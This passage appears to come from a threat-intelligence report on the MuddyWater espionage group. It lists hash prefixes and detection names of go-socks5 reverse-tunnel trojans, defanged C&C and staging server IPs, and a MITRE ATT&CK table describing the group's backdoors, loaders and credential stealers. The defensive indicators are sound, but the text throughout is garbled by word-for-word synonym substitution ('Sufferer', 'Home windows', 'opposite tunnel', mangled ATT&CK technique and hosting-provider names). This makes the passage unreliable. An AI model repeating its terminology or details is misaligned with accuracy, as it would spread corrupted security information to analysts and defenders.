MuddyWater – go‑socks5 reverse tunnel. |
| 52009F36058337B6401D |
bd34a33f5bHOVby |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 535882B6EDAB29247E03 |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 544CE18E4C1F1B288DEE |
1110254b63WfTEa |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 54EBC125039CC83E4682 |
FMAPP.dll | WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 5A08150C1DC17E9F6912 |
bd34a33f5bJeJOf |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 proxy reverse tunnel. |
| 5D1E61DA8083C41FF1FC |
bd34a33f5bJeJOf |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 6532E0437C8913FA418F |
7295be2b1fHxjyf |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 6CA41565844118385B34 |
re |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 6FC50A99AAE1D6C40111 |
8525e604dfKuDNr |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 826CFF5D85713CE4B2F3 |
bd34a33f5bJeJOf |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 87ADD79C7C8335447113 |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 93055115559219BE8441 |
main |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 97C3376AB551E899F347 |
504f53ca8esoLmG |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 99FAD0862E2E8D363F3E |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| A101CBCCD950AA36FC3B |
66f3e097e4tnyHR |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| A227C0A4425E24268B75 |
fa54125dc8ZpaNJ |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| A997A7AAE727D2C12CCE |
fa54125dc8ZpaNJ |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| B0271CA76052EC340014 |
7295be2b1fAzMZI |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| B0CD4F5DF192BFFE6500 |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| B16E7D56A8DC0FF6B3AF |
ESETGO |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| D49979D0063B28BD7339 |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| D518F5C648AB64B390A2 |
bd34a33f5bHOVby |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| DF223D653F761ED55F9C |
66f3e097e4tnyHR |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| DF8FC5213AA11EE445EA |
Revoke.dll | WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| E02DD79A8CAED662969F |
66f3e097e4tnyHR |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| E8F4EA3857EF5FDFEC1A |
main |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| F26CAE9E79871DF3A47F |
7295be2b1fAzMZI |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| FF09608790077E1BA52C |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| A9747A3F58F8F408FECE |
AppVs |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
Network
| IP | Domain | Hosting provider | First seen | Details |
| 3.95.7[.]142 | N/A | Amazon Information Services and products NoVa | 2024‑09‑08 | MuddyWater C&C server. |
| 35.175.224[.]64 | N/A | Amazon Applied sciences Inc. | 2024‑10‑10 | MuddyWater C&C server. |
| 51.16.209[.]105 | api.tikavod |
Amazon Information Services and products Eire Technical Position Account | 2024‑09‑15 | MuddyWater C&C server. |
| 62.106.66[.]112 | N/A | RIPE-NCC-HM-MNT, ORG-NCC1-RIPE | 2024‑09‑29 | MuddyWater staging server. |
| 157.20.182[.]45 | N/A | Hosterdaddy Non-public Restricted | 2024‑04‑18 | MuddyWater staging server. |
| 161.35.172[.]55 | N/A | DigitalOcean, LLC | 2022‑11‑12 | MuddyWater staging server. |
| 167.99.224[.]13 | magically |
DigitalOcean, LLC | 2022‑11‑06 | MuddyWater C&C server. |
| 194.11.246[.]78 | N/A | HosterDaddy Non-public Restricted | 2024‑07‑23 | MuddyWater C&C server. |
| 194.11.246[.]101 | processplan |
Administrator | 2024‑08‑27 | MuddyWater staging and C&C server. |
| 206.71.149[.]51 | N/A | BL Networks | 2023‑10‑30 | MuddyWater staging server. |
| 212.232.22[.]136 | N/A | HosterDaddy Non-public Restricted | 2025‑01‑16 | MuddyWater C&C server. |
MITRE ATT&CK ways
This desk used to be constructed the usage of model 17 of the MITRE ATT&CK framework.
| Tactic | ID | Title | Description |
| Reconnaissance | T1591 | Acquire Sufferer Org Knowledge | MuddyWater gathers sufferer org data to make use of in spearphishing emails. |
| Useful resource Construction | T1583 | Achieve Infrastructure | MuddyWater makes use of obtained infrastructure to host malware obtain places and C&C servers. |
| T1608 | Degree Features | MuddyWater levels equipment like RMM equipment and information stealers on file-hosting websites corresponding to OneHub and Mega Restricted. | |
| T1587.001 | Expand Features: Malware | MuddyWater develops backdoors like MuddyViper and equipment such because the Fooder loader, LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers. | |
| T1588.002 | Download Features: Instrument | MuddyWater makes use of publicly to be had equipment from GitHub, corresponding to HackBrowserData and Cross-based opposite proxies. | |
| Preliminary Get right of entry to | T1566.002 | Phishing: Spearphishing Hyperlink | MuddyWater makes use of spearphishing emails with hyperlinks to dossier internet hosting websites like OneHub and Mega Restricted to host RMM device (Atera, Stage, and PDQ). |
| Execution | T1059.001 | Command-Line Interface: PowerShell | MuddyViper has the potential to open and execute PowerShell scripts. |
| T1059.003 | Command-Line Interface: Home windows Command Shell | MuddyViper has the potential to supply the Home windows Command shell as a opposite shell. | |
| T1559.001 | Inter-Procedure Verbal exchange: Part Object Style | MuddyViper makes use of the ITaskService COM object to create a scheduled process for endurance. | |
| T1106 | Local API | MuddyViper makes use of the CreateProcess API to execute further information and instructions. | |
| T1204.001 | Consumer Execution: Malicious Hyperlink | MuddyWater operators depend on objectives clicking malicious hyperlinks delivered thru spearphishing. | |
| Patience | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | MuddyViper has the potential to duplicate itself to the sufferer’s Startup folder. |
| T1543.003 | Create or Alter Device Procedure: Home windows Carrier | MuddyWater operators try to set up RMM equipment in %PROGRAMFILES%, which additionally contains making a Home windows provider set to autostart. | |
| T1053 | Scheduled Activity/Activity | MuddyViper may also be continued as a scheduled process named ManageOnDriveUpdater. | |
| Protection Evasion | T1134.001 | Get right of entry to Token Manipulation: Token Impersonation/Robbery | The LP-Notes and CE-Notes equipment try to impersonate a logged-on person’s safety context by the use of ImpersonateLoggedOnUser. |
| T1140 | Deobfuscate/Decode Recordsdata or Knowledge | Blub makes use of string obfuscation for storing stolen information. Fooder can extract embedded, AES-encrypted payloads. CE-Notes and LP-Notes each use a tradition byte-wise decryption regimen to decrypt strings. |
|
| T1620 | Reflective Code Loading | The Fooder loader plays reflective code loading to run further equipment (MuddyViper, opposite tunnels, and HackingBrowserData). | |
| T1497.003 | Virtualization/Sandbox Evasion: Time Based totally Evasion | MuddyViper makes use of many calls to a snooze serve as to stumble on and keep away from virtualization and research environments, and usually to inhibit dynamic research. | |
| T1027.007 | Obfuscated Recordsdata or Knowledge: Dynamic API Answer | CE-Notes and LP-Notes carry out dynamic API answer by means of decrypting strings at runtime. | |
| T1134.002 | Get right of entry to Token Manipulation: Create Procedure with Token | Fooder’s launcher makes an attempt to copy the token of a procedure laid out in the operator when launching Fooder by the use of CreateProcessAsUserA. | |
| T1622 | Debugger Evasion | MuddyViper searches for particular debugging equipment, adjusting its conduct accordingly. | |
| T1070.009 | Indicator Elimination: Transparent Patience | MuddyViper can alter registry keys used for endurance, if prompt to uninstall itself. | |
| T1070.004 | Indicator Elimination: Record Deletion | MuddyViper can delete itself from the device, if prompt to uninstall itself. | |
| T1036 | Masquerading | Some variations of Fooder masquerade as an risk free Snake recreation. | |
| T1036.004 | Masquerading: Masquerade Activity or Carrier | MuddyViper can create a job named ManageOnDriveUpdater. | |
| T1112 | Alter Registry | MuddyViper can alter the HKCUSoftwareMicrosoftWindowsCurrentVe |
|
| T1027.009 | Obfuscated Recordsdata or Knowledge: Embedded Payloads | Fooder can extract an embedded, AES-encrypted payload. | |
| T1027.013 | Obfuscated Recordsdata or Knowledge: Encrypted/Encoded Record | Fooder can extract an embedded, AES-encrypted payload. | |
| Credential Get right of entry to | T1555.003 | Credentials from Password Shops: Credentials from Internet Browsers | CE-Notes and Blub try to thieve credentials saved in browsers. |
| T1056.002 | Enter Seize: GUI Enter Seize | MuddyViper and LP-Notes be capable to show a Home windows safety login suggested to seize login credentials and make sure the credentials’ veracity by means of relaying the ones credentials to legit Home windows APIs. | |
| Discovery | T1082 | Device Knowledge Discovery | MuddyViper collects device knowledge from compromised programs and reviews it again to the C&C server. |
| T1518.001 | Instrument Discovery: Safety Instrument Discovery | MuddyViper makes an attempt to get a procedure checklist of operating programs, seems to be for security-related processes and, if discovered, reviews them to the C&C server and modifies its conduct. | |
| Assortment | T1074.001 | Information Staged: Native Information Staging | Blub, CE-Notes, and LP-Notes degree stolen credentials on disk for MuddyViper, opposite tunnels, or RMM equipment to gather and exfiltrate. |
| T1560.001 | Archive Gathered Information: Archive by the use of Application | MuddyViper makes use of PowerShell’s Compress-Archive command to compress browser information accumulated by the use of the HackBrowserData software. | |
| Command and Keep watch over | T1573.001 | Encrypted Channel: Symmetric Cryptography | MuddyViper makes use of AES-CBC encryption to encrypt information prior to exchanging information with the C&C server. |
| T1219 | Faraway Get right of entry to Instrument | MuddyWater use Atera, Stage, and PDQ RMM equipment for far flung get admission to to sufferers’ programs. | |
| T1071.001 | Utility Layer Protocol: Internet Protocols | MuddyViper makes use of HTTPS for C&C communications. The opposite tunnels use a mix of HTTP and HTTPS for C&C communications. | |
| T1105 | Ingress Instrument Switch | MuddyViper has the potential to obtain further payloads from its C&C server. | |
| T1001 | Information Obfuscation | MuddyViper leverages HTTPS for C&C communications, the usage of the Standing header to cover a backdoor command ID within the server-to-client path of the conversation. | |
| T1090 | Proxy | MuddyWater makes use of custom designed variations of cross‑socks5 opposite proxy equipment. | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | MuddyWater equipment exfiltrate information to C&C servers the usage of C&C channels (HTTP and HTTPS). |
| T1030 | Information Switch Measurement Limits | MuddyViper helps downloading/importing information in chunks of restricted measurement. |
